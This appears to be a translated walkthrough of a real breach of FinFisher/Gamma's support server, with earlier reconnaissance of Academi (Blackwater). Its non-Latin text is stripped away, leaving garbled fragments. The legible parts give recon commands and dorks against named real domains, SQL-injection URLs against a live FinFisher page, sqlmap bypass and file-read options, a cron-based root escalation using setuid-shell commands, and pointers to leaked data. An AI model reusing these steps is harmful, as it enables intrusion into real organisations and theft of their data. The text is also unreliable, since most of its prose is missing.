https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


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